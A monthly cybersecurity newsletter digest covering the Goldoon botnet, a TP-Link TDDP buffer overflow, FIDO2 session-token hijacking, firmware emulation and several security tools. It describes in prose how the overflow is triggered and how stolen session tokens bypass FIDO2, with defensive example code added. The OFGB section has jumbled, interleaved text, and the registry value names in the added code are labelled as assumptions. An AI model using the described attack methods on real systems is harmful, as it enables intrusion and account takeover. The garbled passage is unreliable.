Overkill Security. Digest. 2024-06

Uploaded by Yury Chemerkin

NOTHING SAYS 'SECURITY' LIKE A DOZEN FIREWALLS AND A BIOMETRIC SCANNER

OVERKILL SECURITY
MONTHLY DIGEST. 2024 / 06
Find more: Boosty | Sponsr | Telegram
Welcome to the next edition of our Monthly Digest, your one-stop resource for staying informed on the most recent developments, insights, and best practices in the ever-evolving field of security. In this issue, we have curated a diverse collection of articles, news, and research findings tailored to both professionals and casual enthusiasts. Our digest aims to make our content both engaging and accessible. Happy reading!

Section: “Keypoints”
High-impact summaries of in-depth content, serving as a compacted edition of the other sections for quick, comprehensive overviews.

Section: “Unpacking”
Critical reviews of existing cyber content, highlighting its benefits and drawbacks.

Section: “Research”
Original studies, experiments and in-depth investigations offering comprehensive reports and findings that advance the understanding of cybersecurity issues.

Read more: Boosty | Sponsr | TG

NEWS
BOTNET TARGETS DECADE-OLD FLAW IN UNPATCHED D-LINK DEVICES

A botnet named "Goldoon" has been targeting a decade-old vulnerability in unpatched D-Link devices.

• Vulnerability Exploited: Goldoon exploits CVE-2015-2051, a critical security flaw with a CVSS score of 9.8, affecting D-Link DIR-645 routers. This vulnerability allows remote attackers to execute arbitrary commands via specially crafted HTTP requests.
• Botnet Activities: Once a device is compromised, attackers gain complete control, enabling them to extract system information, establish communication with a command-and-control (C2) server, and use the devices to launch further attacks, such as distributed denial-of-service (DDoS) attacks.
• DDoS Attack Methods: The Goldoon botnet is capable of launching a variety of DDoS attacks using methods such as TCP flooding, ICMP flooding, and more specialized attacks like Minecraft DDoS.
• Propagation and Stealth: The botnet initiates its attack by exploiting CVE-2015-2051 to deploy a "dropper" script from a malicious server. This script is designed to be self-erasing to avoid detection and operates across various Linux system architectures. The dropper downloads and executes a file, setting the stage for further malicious activities.
• Mitigation and Prevention: Users are urged to update their D-Link devices promptly. Additionally, implementing network monitoring solutions, establishing strong firewall rules, and staying informed about the latest security bulletins and patches are crucial steps in staying ahead of evolving threats.
• Impact and Severity: The exploitation of CVE-2015-2051 by the Goldoon botnet presents a low attack complexity but has a critical security impact that can lead to remote code execution. The botnet's activity spiked in April 2024, almost doubling the usual frequency.
• Recommendations: Fortinet recommends applying patches and updates whenever possible due to the ongoing development and introduction of new botnets. Organizations are also advised to go through Fortinet's free cybersecurity training module to help end users learn how to identify and protect themselves from phishing attacks.

Affected Industries
• Home and Small Business Networks: These are directly impacted as D-Link routers are commonly used in these environments. The compromise of these routers can lead to network disruptions and unauthorized access to network traffic.
• Internet Service Providers (ISPs): ISPs may face increased pressure to assist customers in updating or replacing vulnerable devices, and they may experience increased network load from DDoS attacks originating from compromised routers.
• Cybersecurity Firms: These organizations may see an increased demand for security services, including threat detection, system hardening, and response to incidents involving compromised routers.
• E-commerce and Online Services: Companies in this sector could be targets of DDoS attacks launched from compromised devices, potentially leading to service disruptions and financial losses.
• Healthcare: With a growing number of healthcare services relying on internet connectivity, compromised routers could pose risks to patient data integrity and availability of critical services.

Consequences
• Network Compromise and Data Breaches: Attackers can gain complete control over compromised routers, potentially leading to data theft, including sensitive personal and financial information.
• Distributed Denial-of-Service (DDoS) Attacks: The botnet can launch various DDoS attacks, which could cripple network infrastructure, disrupt services, and cause significant downtime for affected organizations.
• Increased Operational Costs: Organizations may need to invest in enhanced security measures, conduct widespread audits, and replace or update vulnerable devices, leading to increased operational expenses.
• Reputational Damage: Companies affected by attacks stemming from compromised routers may suffer reputational damage if they are perceived as not adequately protecting customer data or ensuring service availability.
• Regulatory and Legal Implications: Entities that fail to secure their networks adequately may face regulatory scrutiny and potential legal challenges, especially if consumer data is compromised due to negligence in addressing known vulnerabilities.

QEMU TO EMULATE IOT FIRMWARE

The article provides a detailed guide on using QEMU to emulate IoT firmware, specifically focusing on a practical example involving the emulation of a router's firmware. The author shares insights and detailed steps on how to effectively use QEMU for security research and testing purposes.

• Overview of QEMU: QEMU stands for "Quick EMUlator" and is utilized to emulate various hardware architectures, making it a valuable tool for security researchers who need to test software in a controlled environment without physical hardware. The guide emphasizes the use of Ubuntu 18.04 for setting up QEMU due to the ease of managing interfaces on this distribution.
• Initial Setup and Installation: The document outlines the initial steps to install QEMU and its dependencies on Ubuntu 18.04, including the installation of libraries and tools necessary for network bridging and debugging with pwndbg.
• Firmware Analysis and Preparation: Binwalk is used to analyze and extract the contents of the firmware. The guide details how to use Binwalk to identify and decompress the components of the firmware, focusing on the squashfs file system, which is crucial for the emulation process.
• Emulation Process: The chroot environment involves copying the qemu-mips-static binary to the firmware directory and using chroot to run the firmware's web server directly. System mode emulation uses a script and additional downloads (like vmlinux and a Debian image) to create a more stable and integrated emulation environment.
• Debugging and Network Configuration: Detailed steps are provided on setting up network bridges and interfaces to allow the emulated firmware to communicate with the host system. The guide also covers the mounting of various directories (/dev, /proc, /sys) to ensure the emulated system has access to necessary resources.
• Running and Interacting with the Emulated Firmware: Once the setup is complete, the firmware is run, and the user can interact with the emulated web server through a browser. The guide includes troubleshooting tips for common issues like incorrect paths or missing files that might cause the server to fail.
• Security Testing and Reverse Engineering: The document concludes with insights into using the emulation setup for security testing and reverse engineering. It mentions tools like Burp Suite for capturing web requests and Ghidra for analyzing binaries.
• Practical Demonstration: A practical demonstration of finding and exploiting a command injection vulnerability in the emulated firmware is provided, showcasing how QEMU can be used to test and develop proofs of concept for security vulnerabilities.

TP-LINK TDDP BUFFER OVERFLOW VULNERABILITY

The article provides a detailed analysis of a specific vulnerability in TP-Link devices that was reported in 2020 but did not receive a CVE assignment.

Causes of the TP-Link TDDP Buffer Overflow Vulnerability
The TP-Link TDDP (TP-LINK Device Debug Protocol) buffer overflow vulnerability primarily stems from the protocol's handling of UDP packets. TDDP, a binary protocol used for debugging purposes, processes each request as a single UDP packet, which is prone to security risks if not properly handled. The specific cause of the buffer overflow is the lack of proper verification of data length during the parsing of these UDP packets. This oversight allows for memory overflow, which corrupts the memory structure of the device.

Impacts of the Vulnerability
The primary impact of the TP-Link TDDP buffer overflow vulnerability is a denial of service (DoS). This occurs when the overflow corrupts the memory structure, causing the device to crash or become unresponsive. Additionally, there is a potential for remote code execution, which could allow an attacker to execute arbitrary code on the device. This could lead to unauthorized access to the network, data theft, or further exploitation of network resources.

Exploitation Techniques
Exploitation of the TP-Link TDDP buffer overflow vulnerability involves sending crafted UDP packets that exceed the buffer limits set by the protocol. This can be achieved by manipulating the packet's data length to be longer than what the buffer can handle, leading to overflow. Tools like Shambles can be used to identify, reverse, emulate, and validate such buffer overflow conditions. Successful exploitation could allow attackers to cause a denial of service or potentially execute arbitrary code on the device.

Mitigation Strategies
• Firmware Updates: Regularly updating the firmware of TP-Link devices to the latest version can help patch vulnerabilities and improve security.
• Network Segmentation: Placing critical devices on separate network segments can limit the spread of potential attacks.
• Firewall Rules: Configuring firewalls to restrict incoming traffic on UDP port 1040, which is used by TDDP, can prevent unauthorized access.
• Vulnerability Scanners: Using security tools to regularly scan for vulnerabilities can help identify and mitigate them before they are exploited.

Overview of TDDP
• TP-Link Device Debug Protocol (TDDP): A binary protocol used primarily for debugging purposes that operates through a single UDP packet. This protocol is documented in patent CN102096654A.
• Packet Structure: The TDDP packet includes fields such as Version, Type, Code, ReplyInfo, PktLength, PktID, SubType, Reserve, and MD5 Digest, which are crucial for the protocol's operation.

Vulnerability Analysis / Function Analysis
• tddpEntry (sub_4045f8 0x004045F8): This function continuously checks for incoming data using the recvfrom function and passes the data to TddpPktInterfaceFunction without validating the received data size.
• GetTddpMaxPktBuff (sub_4042d0 0x004042D0): Returns a buffer size of 0x14000.
• tddp_versionTwoOpt (sub_404b40 0x00405990) and tddp_deCode (sub_404fa4 0x00405014): Functions involved in processing and decoding the TDDP packet. They handle data decryption using DES and verify the integrity of the decrypted data.

Exploitation Mechanism
• Buffer Overflow Trigger: The vulnerability is triggered when the packet length specified in the TDDP packet exceeds the buffer size (0x14000), leading to a buffer overflow.
• Decryption and MD5 Verification: The des_min_do function is used for decryption, and the MD5 digest of the packet is verified against the MD5 digest of the data. If the packet length is manipulated to exceed the buffer size, it leads to memory corruption and a denial of service (DoS).

Proof of Concept (PoC)
• Setup: The PoC involves setting up a virtual machine (VM) with the firmware and running the tddpd service.
• Exploit Code: The document includes Python code that crafts a TDDP packet with specific fields manipulated to trigger the buffer overflow.
• Result: Executing the PoC results in the tddpd program crashing, confirming the vulnerability.

Conclusion
• Impact: The vulnerability leads to a denial of service and potentially allows for remote code execution if further exploited.
• Recommendations: Regular updates and patches, network segmentation, and proper validation of incoming data are recommended to mitigate such vulnerabilities.
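The TDDP analysis above says tddpEntry hands whatever recvfrom returns to TddpPktInterfaceFunction without checking its size against the 0x14000 buffer from GetTddpMaxPktBuff, and the conclusion asks for proper validation of incoming data. The following is an added example, not code from the article, from its PoC, or from TP-Link's firmware: a receive-side parser that applies the missing checks (header present, advertised PktLength within the buffer, PktLength consistent with the bytes actually received, MD5 digest intact) and drops everything else. The field names, the 0x14000 limit and UDP port 1040 come from the write-up; the field widths, the big-endian byte order, the digest convention and the fixture values are assumptions made for this example.

```python
import hashlib
import struct
from typing import Optional

# Header layout assumed from the field list in the write-up (Version, Type, Code, ReplyInfo,
# PktLength, PktID, SubType, Reserve, MD5 Digest). Field widths and big-endian byte order
# are assumptions made for this example; they were not taken from the firmware.
TDDP_HEADER = struct.Struct(">BBBBIHBB16s")
TDDP_HEADER_LEN = TDDP_HEADER.size       # 28 bytes
DIGEST_OFFSET = TDDP_HEADER_LEN - 16     # the 16-byte MD5 field is the last header field
MAX_PKT_BUFF = 0x14000                   # value returned by GetTddpMaxPktBuff per the write-up
TDDP_UDP_PORT = 1040                     # port named in the mitigation section


class TddpError(ValueError):
    """Raised when a datagram fails one of the checks the write-up says tddpd skipped."""


def parse_tddp(datagram: bytes) -> dict:
    """Parse one TDDP datagram, refusing anything that would not fit the 0x14000 buffer."""
    if len(datagram) < TDDP_HEADER_LEN:
        raise TddpError("datagram shorter than the TDDP header")
    (version, ptype, code, reply_info, pkt_length,
     pkt_id, sub_type, reserve, digest) = TDDP_HEADER.unpack_from(datagram)
    payload = datagram[TDDP_HEADER_LEN:]
    # Check 1: the advertised length must fit the receive buffer alongside the header.
    # The write-up identifies the absence of this check as the overflow trigger.
    if pkt_length > MAX_PKT_BUFF - TDDP_HEADER_LEN:
        raise TddpError(f"PktLength {pkt_length:#x} exceeds the {MAX_PKT_BUFF:#x} buffer")
    # Check 2: the advertised length must match what recvfrom actually delivered.
    if pkt_length != len(payload):
        raise TddpError(f"PktLength {pkt_length} does not match received payload {len(payload)}")
    # Check 3: integrity. Assumed convention: MD5 over the packet with the digest field zeroed.
    zeroed = datagram[:DIGEST_OFFSET] + b"\x00" * 16 + payload
    if hashlib.md5(zeroed).digest() != digest:
        raise TddpError("MD5 digest mismatch")
    return {"version": version, "type": ptype, "code": code, "reply_info": reply_info,
            "pkt_length": pkt_length, "pkt_id": pkt_id, "sub_type": sub_type,
            "reserve": reserve, "payload": payload}


def check_datagram(datagram: bytes) -> str:
    """Return "ok" or the rejection reason a hardened receive loop would log before dropping it."""
    try:
        parse_tddp(datagram)
        return "ok"
    except TddpError as exc:
        return str(exc)


def build_tddp(payload: bytes, *, version: int = 2, ptype: int = 3, code: int = 1,
               pkt_id: int = 1, pkt_length: Optional[int] = None) -> bytes:
    """Test fixture: assemble a datagram with a correct digest. pkt_length may be overridden
    so a negative test can confirm the parser rejects an inconsistent length field."""
    length = len(payload) if pkt_length is None else pkt_length
    head = TDDP_HEADER.pack(version, ptype, code, 0, length, pkt_id, 0, 0, b"\x00" * 16)
    digest = hashlib.md5(head + payload).digest()
    return head[:DIGEST_OFFSET] + digest + payload


if __name__ == "__main__":
    good = build_tddp(b"constructed-debug-request")
    print(check_datagram(good))
    print(check_datagram(build_tddp(b"x", pkt_length=0x14001)))   # length field exceeds buffer
    print(check_datagram(good[:-3]))                              # truncated on the wire
```

Run as a script it prints one accepted datagram and two rejection reasons. The parser never transmits anything, so it can be pointed at recorded UDP payloads from a lab capture; the length checks are cheap and run before any decryption, which is the order a fix in tddpd would need as well.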

QCSUPER: EAVESDROPPING ON DEVICE BECOMES A HOBBY

QCSuper is a versatile tool that serves multiple purposes across different sectors. Its ability to capture and analyze raw radio frames from Qualcomm-based devices makes it indispensable for telecom operators, security researchers, network developers, and educators.

Main Features of QCSuper
• Protocol Support: Captures raw radio frames for 2G (GSM), 2.5G (GPRS and EDGE), 3G (UMTS), and 4G (LTE) networks. Partial support for 5G is available for certain models.
• Device Compatibility: Works with Qualcomm-based phones and modems, including rooted Android devices and USB dongles.
• Data Output: Generates PCAP files with GSMTAP encapsulation, which can be analyzed using Wireshark.
• Ease of Use: Simple commands to start capturing data.
• Cross-Platform Support: Can be installed on both Linux and Windows systems, with detailed instructions provided for both platforms.
• Research and Analysis: Widely used by telecom, mobile, and security researchers for analyzing radio communication exchanges.

Hardware Requirements for Using QCSuper
• Qualcomm-Based Devices: The primary requirement is a Qualcomm-based phone or modem. This is because QCSuper relies on the Qualcomm Diag protocol to capture raw radio frames.
• Rooted Android Phone or USB Modem: For Android phones, the device must be rooted to access the necessary diagnostic interfaces.
• Operating System Compatibility: QCSuper has been tested on Ubuntu LTS 22.04 and Windows 11. It is recommended to use Linux for better compatibility.
• Wireshark: Wireshark is needed to analyze the PCAP files generated by QCSuper. Different versions of Wireshark are required depending on the type of frames being captured (e.g., Wireshark 2.x - 4.x for 2G/3G frames, Wireshark 2.5.x for 4G frames, and Wireshark 3.6.x for 5G frames).

Limitations
• QCSuper cannot be used with non-Qualcomm phones. The tool specifically relies on the Qualcomm Diag protocol to capture raw radio frames, which is a proprietary protocol available only on Qualcomm-based devices. Therefore, it is not compatible with phones or modems that do not use Qualcomm chipsets.
• QCSuper cannot capture 5G radio frames on all devices. The ability to capture 5G frames is limited to certain models of Qualcomm-based devices. The tool has partial support for 5G, and this functionality has been tested under specific conditions with Wireshark 3.6.x. Therefore, not all Qualcomm-based devices will necessarily support 5G frame capture, and users may need to verify compatibility for their specific device model.

Application

Telecommunications Industry:
• Network Analysis: QCSuper enables telecom operators to capture and analyze radio communication exchanges between mobile devices and the network. This helps in understanding network performance, diagnosing issues, and optimizing network configurations.
• Protocol Compliance: By capturing raw radio frames, telecom companies can ensure that their networks comply with industry standards and protocols, such as those defined by 3GPP for 2G, 3G, 4G, and 5G networks.

Mobile Security:
• Security Research: Security researchers can use QCSuper to study vulnerabilities in mobile networks. By analyzing the captured frames, they can identify potential security flaws and develop mitigation strategies.
• Penetration Testing: QCSuper is useful for conducting penetration tests on mobile networks. It allows security professionals to simulate attacks and assess the resilience of the network against various threats.

Network Research and Development:
• Protocol Analysis: Researchers can use QCSuper to capture and analyze signaling information and user data at different layers of the mobile network stack. This is crucial for developing new protocols and improving existing ones.
• 5G Research: With partial support for 5G, QCSuper is instrumental in studying the latest advancements in mobile technology. Researchers can analyze 5G frames to understand the new features and challenges associated with 5G networks.

Educational and Training Purposes:
• Training Programs: QCSuper is used in training programs to educate telecom and security professionals about mobile network protocols and security. It provides hands-on experience in capturing and analyzing real-world network traffic.
• Academic Research: Universities and research institutions can leverage QCSuper for academic projects and research, helping students and researchers gain practical insights into mobile network operations.

INCIDENT RESPONSE MADE EASY: USING BUCKETLOOT FOR CLOUD STORAGE FORENSICS

BucketLoot's versatility across multiple cloud platforms and its comprehensive feature set make it a valuable addition to the toolbox of security professionals, DevOps teams, and organizations seeking to enhance their cloud security posture and protect sensitive data stored in cloud object storage buckets.

Key Features
• Automated Cloud Bucket Inspection: BucketLoot can automatically scan and inspect S3-compatible cloud storage buckets across multiple platforms, including Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces, and custom domains/URLs.
• Asset Extraction: The tool can extract valuable assets stored in the buckets, such as URLs, subdomains, and domains, which can be useful for attack surface management and reconnaissance.
• Secret Exposure Detection: BucketLoot can detect and flag potential secret exposures, such as API keys, access tokens, and other sensitive information, helping organizations identify and mitigate security risks.
• Custom Keyword and Regex Searching: Users can search for specific keywords or regular expressions within the bucket files, enabling targeted searches for sensitive data or specific types of information.
• Efficient Scanning: BucketLoot focuses on scanning files that store data in plain-text formats, optimizing the scanning process and improving performance.
• Flexible Scanning Modes: The tool offers a guest mode for initial scans without requiring credentials, as well as a complete scan mode with platform credentials for more comprehensive analysis.
• JSON Output: BucketLoot provides its output in a JSON format, making it easy to parse and integrate the results into existing workflows or other security tools.

Usefulness Across Industries and for Security Experts
• Cybersecurity Professionals: BucketLoot is an invaluable tool for cybersecurity professionals, such as penetration testers, bug hunters, and security researchers, as it aids in identifying potential vulnerabilities and data exposures in cloud storage configurations.
• Cloud Service Providers: Organizations that offer cloud services can leverage BucketLoot to ensure the security of their customers' data stored in cloud buckets and maintain compliance with industry standards.
• DevSecOps and DevOps Teams: By integrating BucketLoot into their workflows, DevSecOps and DevOps teams can proactively identify and mitigate security risks associated with cloud storage, promoting secure software development practices.
• Incident Response and Forensics: In the event of a data breach or security incident, BucketLoot can assist incident response teams and forensic investigators in quickly identifying exposed data and potential attack vectors related to cloud storage misconfigurations.
• Compliance and Risk Management: Organizations subject to regulatory compliance requirements, such as GDPR, HIPAA, or PCI-DSS, can use BucketLoot to ensure the secure handling of sensitive data stored in cloud buckets and demonstrate adherence to data protection standards.
• Bug Bounty Programs: Bug bounty hunters and researchers can leverage BucketLoot to uncover potential vulnerabilities and data exposures in cloud storage configurations, contributing to the overall security posture of organizations and earning rewards.

FIDO2: PHISHING-RESISTANT, BUT NOT TOKEN-RESISTANT

The article on Silverfort's blog explores how MITM attacks can bypass FIDO2's phishing-resistant protections. It details the FIDO2 authentication flow, highlights vulnerabilities in session token handling, and provides real-world examples involving Entra ID SSO, PingFederate, and Yubico Playground, concluding with mitigation strategies to enhance security.

FIDO2 Background
• FIDO2 is a modern passwordless authentication standard developed by the FIDO Alliance to replace passwords.
• It aims to protect against phishing, man-in-the-middle (MITM), and session hijacking attacks.
• The authentication flow involves device registration and authentication steps using public key cryptography.

FIDO2 Security Features
• FIDO2 is designed to prevent phishing, MITM, and session hijacking attacks.
• However, the research found that FIDO2 implementations often do not protect session tokens after successful authentication.

Attacking FIDO2 with MITM
• The author investigated MITM attacks on identity providers (IdPs) that relay communications between devices.
• While MITM is more difficult with TLS, methods like DNS spoofing, ARP poisoning, and certificate theft can achieve it.
• By performing MITM on the IdP, the attacker can hijack the session token after FIDO2 authentication.

Entra ID SSO (Microsoft)
• Overview: Entra ID SSO is a single sign-on solution that supports various SSO protocols and modern authentication methods, including FIDO2.
• Vulnerability: The research demonstrated that an attacker could hijack sessions by exploiting the way Entra ID handles session tokens.
• Attack Method: The attacker does not need to relay the entire authentication process. Instead, they can use a signed token provided by the IdP, which has an expiration time of one hour. This token can be reused within the valid time frame to generate state cookies for a longer period.
• Example: The native Azure Management portal application does not validate the token granted by the SSO, allowing an attacker to use a stolen token to gain unauthorized access.

PingFederate
• Overview: PingFederate is an SSO solution that uses third-party adapters to perform authentication. These adapters can be chained into an authentication policy flow.
• Vulnerability: The research found that if the relying party developer does not validate the OIDC token (or SAML Response), the MITM attack can be successful.

• Attack Method: The attack exploits the weakest link in the authentication chain. Since the SSO protocols rely on granting tokens that can be reused by different devices, an attacker can hijack the session by stealing these tokens.
• Example: The PingOne adapter can be used with FIDO2 capabilities. If the OIDC token is not validated, an attacker can bypass FIDO2 protections and gain unauthorized access.

Yubico Playground
• Overview: Yubico Playground is a testing environment for FIDO security features and keys.
• Vulnerability: The research showed that a simple session cookie generated after FIDO2 authentication can be exploited.
• Attack Method: There is no validation on the device that requested the session cookie. Any device can use this cookie until it expires, allowing an attacker to bypass the authentication step.
• Example: By acquiring the session cookie, an attacker can access the user's private area and remove the security key from the user's profile, demonstrating a straightforward session hijacking scenario.

RAYTRACING ON A ZX SPECTRUM: WHO NEEDS MODERN GPUS WHEN YOU CAN SPEND A WEEKEND RENDERING A SINGLE FRAME TO PROVE THAT MASOCHISM CAN BE A HOBBY?

The ZX Raytracer project not only demonstrates the feasibility of implementing a raytracer on the ZX Spectrum but also serves as an educational resource, a celebration of computing history, and an inspiration for future projects in retro computing, embedded systems, and optimization techniques.

Key Points & Potential Uses
• Implementing a Raytracer on Legacy Hardware: The project demonstrates the possibility of implementing a raytracer, a computationally intensive graphics rendering technique, on the ZX Spectrum, a home computer from the 1980s with very limited hardware capabilities (3.5MHz Z80A CPU and often only 16KB RAM).
• Overcoming Hardware Limitations: Despite the severe hardware constraints, the project overcame challenges like attribute clash (color limitations), low resolution (256x176 pixels), and slow performance (initial render time of 17 hours per frame) through clever optimizations and approximations.
• Educational Tool: The project could be used as a teaching aid in computer science courses, particularly those focused on computer graphics, optimization techniques, or low-level programming.
• Retro Gaming and Demoscene Exhibitions: The raytracer could be showcased at retro computing events, demoscene parties, or exhibitions celebrating the achievements of vintage hardware and programming.
• Embedded Systems Development: The optimization techniques and approximations used in this project could inspire developers working on embedded systems or resource-constrained devices, where efficient use of limited resources is crucial.
• Appreciation of Computing History: The project could be featured in museums or exhibitions dedicated to the history of computing, showcasing the ingenuity and creativity of early programmers working with limited hardware resources.
• Inspiration for Future Projects: The success of this project could motivate others to explore the limits of legacy hardware or undertake similar challenging projects, pushing the boundaries of what is possible on vintage systems.

ICSPECTOR: SOLVING PROBLEMS YOU DIDN'T KNOW YOU HAD

The Microsoft ICS Forensics Tools framework, known as ICSpector, is an open-source tool designed to facilitate the forensic analysis of Industrial Control Systems (ICS), particularly focusing on Programmable Logic Controllers (PLCs).

Key Technical Points of ICSpector

Framework Composition and Architecture
• Modular Design: ICSpector is composed of several components that can be developed and executed separately, allowing for flexibility and customization based on specific needs. Users can also add new analyzers.
• Network Scanner: Identifies devices communicating via supported OT protocols and ensures they are responsive. It can work with a provided IP subnet or a specific IP list exported from OT security products.
• Data Extraction & Analyzer: Extracts PLC project metadata and logic, converting raw data into a human-readable form to highlight areas that may indicate malicious activity.

Forensic Capabilities
• Identification of Compromised Devices: Helps in identifying compromised devices through manual verification, automated monitoring, or during incident response.
• Snapshot Creation: Allows for the creation of snapshots of controller projects to compare changes over time, aiding in the detection of tampering or anomalies.
• Support for Siemens PLCs: Currently supports Siemens SIMATIC S7-300 and S7-400 families, with plans to support other PLC families in the future.

Integration with Other Tools
• Microsoft Defender for IoT: Can be used alongside Microsoft Defender for IoT, which provides network-layer security, continuous monitoring, asset discovery, threat detection, and vulnerability management for IoT/OT environments.

Use Cases
• Incident Response: Useful for incident response operations to detect compromised devices and understand if PLC code was tampered with.

• Proactive Security: Helps in proactive incident response by comparing PLC programs on engineering workstations with those on the actual devices to detect unauthorized changes.

Industries
• Nuclear, Thermal, and Hydroelectric Power Plants: Power plants rely heavily on Industrial Control Systems (ICS) to manage critical operations. ICSpector can be used to ensure the integrity of Programmable Logic Controllers (PLCs) that control these processes. By detecting any anomalous indicators or compromised configurations, ICSpector helps prevent disruptions that could lead to power outages or safety hazards.
• Water Treatment Plants: These facilities use ICS to control the treatment processes that ensure water safety. ICSpector can help in monitoring and verifying the integrity of PLCs, ensuring that the water treatment processes are not tampered with, which is crucial for public health and safety.
• Industrial Manufacturing: In manufacturing environments, ICS are used to control machinery and production lines. ICSpector can be used to detect any unauthorized changes or anomalies in the PLCs, ensuring consistent product quality and preventing costly downtimes due to equipment failure.
• Critical Infrastructure Sectors: This includes sectors like energy, water, transportation, and communication systems. ICSpector can be used to safeguard the ICS that control these critical infrastructures from cyberattacks, ensuring their continuous and secure operation.
• Chemical Processing Plants: These plants use ICS to manage complex chemical processes. ICSpector can help in ensuring that the PLCs controlling these processes are secure and have not been tampered with, which is vital for preventing hazardous incidents.
• Oil and Gas Industry: ICS are used extensively in the oil and gas sector for drilling, refining, and distribution processes. ICSpector can be used to monitor and verify the integrity of these systems, preventing disruptions that could lead to significant financial losses and environmental damage.

REGISTRY HACKING FOR DUMMIES: REMOVING ADS THE HARD WAY BY OFGB (OH FRICK GO BACK)

The OFGB (Oh Frick Go Back) tool is designed to remove ads from various parts of the Windows 11 operating system by modifying specific keys in the Windows

• Written in C# and WPF: OFGB is developed using C# and Windows Presentation Foundation (WPF), which provides a graphical user interface for the tool.
• Credits and Inspiration: The registry keys and comments about their function were inspired by Shawn Brink's script. Additionally, the app's theme is influenced by a project called DarkNet by Aldaviva.
• Building the Tool: To build OFGB, users need Visual Studio and the .NET 8.0 SDK. The repository can be cloned or downloaded as a ZIP file, and the solution can be built in Visual Studio using Ctrl + Shift + B or the Build > Build Solution menu option.
• Safety and Distribution: The developer emphasizes that GitHub is the only official distribution platform for OFGB. Downloads from other websites are not guaranteed to be safe.
• Alternative Suggestion: For users who want to avoid dealing with these ads altogether, the developer humorously suggests trying Linux.

Advantages of OFGB:
• Simple and User-Friendly Interface: OFGB provides a straightforward graphical user interface (GUI) with checkboxes for different types of ads, making it easy for non-technical users to disable ads without dealing with the Windows Registry directly.
• Comprehensive Ad Removal: OFGB covers a wide range of ads, including those in the Start Menu, File Explorer, Lock Screen, Settings app, and more, providing a one-stop solution for ad removal.
• Open-Source and Free: Being an open-source project available on GitHub, OFGB is free to use, and users can inspect the source code for transparency and security.

Disadvantages of OFGB:
• Limited Functionality: Unlike more comprehensive tools like Shutup10 or Wintoys, OFGB is focused solely on ad removal and does not offer additional features for privacy, telemetry, or other Windows customizations.
• Potential Compatibility Issues: As a third-party tool modifying the Windows Registry, there is a risk of compatibility issues or conflicts with future Windows updates, which could potentially break the ad removal settings.
• Lack of Automatic Updates: OFGB does not have an automatic update mechanism, so users may need to manually check for and install new versions as Microsoft introduces new types of ads or changes registry keys.

In comparison, tools like Shutup10, Wintoys, and Tiny11 Builder offer more comprehensive functionality, including privacy and
Registry. telemetry controls, customization options, and the ability to create
custom Windows images. However, these tools may be more complex
Key Features and Functionality to use, especially for non-technical users.
�Ad Removal: The primary function of OFGB is to disable ads
that were introduced in a Windows 11 update on April 23, 2024. These
ads appear in various parts of the OS, including the File Explorer and
Start Menu.
�Registry Modification: The tool works by changing certain
keys in the Windows Registry. This method is used to disable the ads
effectively.
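The registry-modification approach described above, as an added example that is not code from the OFGB project: it audits which ad surfaces are currently on, builds a reversible plan (old value kept next to the new one) and only writes to HKCU when explicitly asked. The registry value names below are assumptions taken from commonly documented Windows 11 settings, not from this page; confirm them against the OFGB source before relying on them. The audit and plan functions work on a snapshot dictionary so they run on any OS; `read_snapshot` and `apply_plan` use `winreg` and do real work only on Windows.

```python
"""Audit and (optionally) apply Windows 11 ad-related registry toggles.

Added example for this digest, not OFGB's code. Value names are assumptions
(widely documented HKCU settings); verify them against the OFGB repository.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

try:
    import winreg  # present only on Windows
except ImportError:
    winreg = None  # audit/plan still work on a snapshot taken elsewhere

EXPLORER = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
CDM = r"Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager"


@dataclass(frozen=True)
class AdToggle:
    surface: str   # where the ad is shown
    key: str       # key path under HKEY_CURRENT_USER
    value: str     # REG_DWORD value name
    ad_off: int    # value that disables that surface


# Assumed mapping (not from the digest): HKCU DWORDs usually associated with
# each ad surface, and the value that turns the surface off.
AD_TOGGLES: List[AdToggle] = [
    AdToggle("File Explorer sync-provider ads", EXPLORER, "ShowSyncProviderNotifications", 0),
    AdToggle("Start Menu recommendations", EXPLORER, "Start_IrisRecommendations", 0),
    AdToggle("Lock Screen tips and ads", CDM, "RotatingLockScreenOverlayEnabled", 0),
    AdToggle("Settings app suggestions", CDM, "SubscribedContent-338393Enabled", 0),
]

# (key, value) -> DWORD, or None when the value does not exist
Snapshot = Dict[Tuple[str, str], Optional[int]]


def audit(snapshot: Snapshot) -> Dict[str, str]:
    """Classify each surface as 'off', 'on' or 'not set'.

    An absent value is reported on its own: Windows then uses its default
    (the surface enabled), so 'not set' has to be treated as 'on'.
    """
    result = {}
    for t in AD_TOGGLES:
        current = snapshot.get((t.key, t.value))
        if current is None:
            result[t.surface] = "not set"
        else:
            result[t.surface] = "off" if current == t.ad_off else "on"
    return result


def plan_changes(snapshot: Snapshot) -> List[Tuple[str, str, Optional[int], int]]:
    """Return (key, value, old, new) tuples needed to switch every surface off.

    Values already off are skipped. Keeping 'old' makes the plan revertible;
    old == None means the value did not exist before.
    """
    return [(t.key, t.value, snapshot.get((t.key, t.value)), t.ad_off)
            for t in AD_TOGGLES if snapshot.get((t.key, t.value)) != t.ad_off]


def read_snapshot() -> Snapshot:
    """Read the toggles from HKCU. Windows only; returns {} elsewhere."""
    snapshot: Snapshot = {}
    if winreg is None:
        return snapshot
    for t in AD_TOGGLES:
        try:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, t.key) as k:
                data, kind = winreg.QueryValueEx(k, t.value)
                snapshot[(t.key, t.value)] = int(data) if kind == winreg.REG_DWORD else None
        except FileNotFoundError:  # missing key or missing value
            snapshot[(t.key, t.value)] = None
    return snapshot


def apply_plan(plan, dry_run: bool = True) -> int:
    """Write the planned DWORDs under HKCU; with dry_run only print them.

    Only the current user's hive is touched, and Explorer must be restarted
    (or the user signed out) before the change is visible.
    """
    for key, value, old, new in plan:
        print(f"{'would set' if dry_run else 'setting'} HKCU\\{key}\\{value}: {old} -> {new}")
        if not dry_run and winreg is not None:
            with winreg.CreateKey(winreg.HKEY_CURRENT_USER, key) as k:
                winreg.SetValueEx(k, value, 0, winreg.REG_DWORD, new)
    return len(plan)


if __name__ == "__main__":
    snap = read_snapshot()
    for surface, state in audit(snap).items():
        print(f"{state:>7}  {surface}")
    apply_plan(plan_changes(snap), dry_run=True)
```

Run it once with the default dry run, keep the printed old values, and only then re-run with `dry_run=False`; the plan is the backup the "compatibility issues" point above implies you will need after a feature update resets the values.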

9
Read more: Boosty | Sponsr | TG

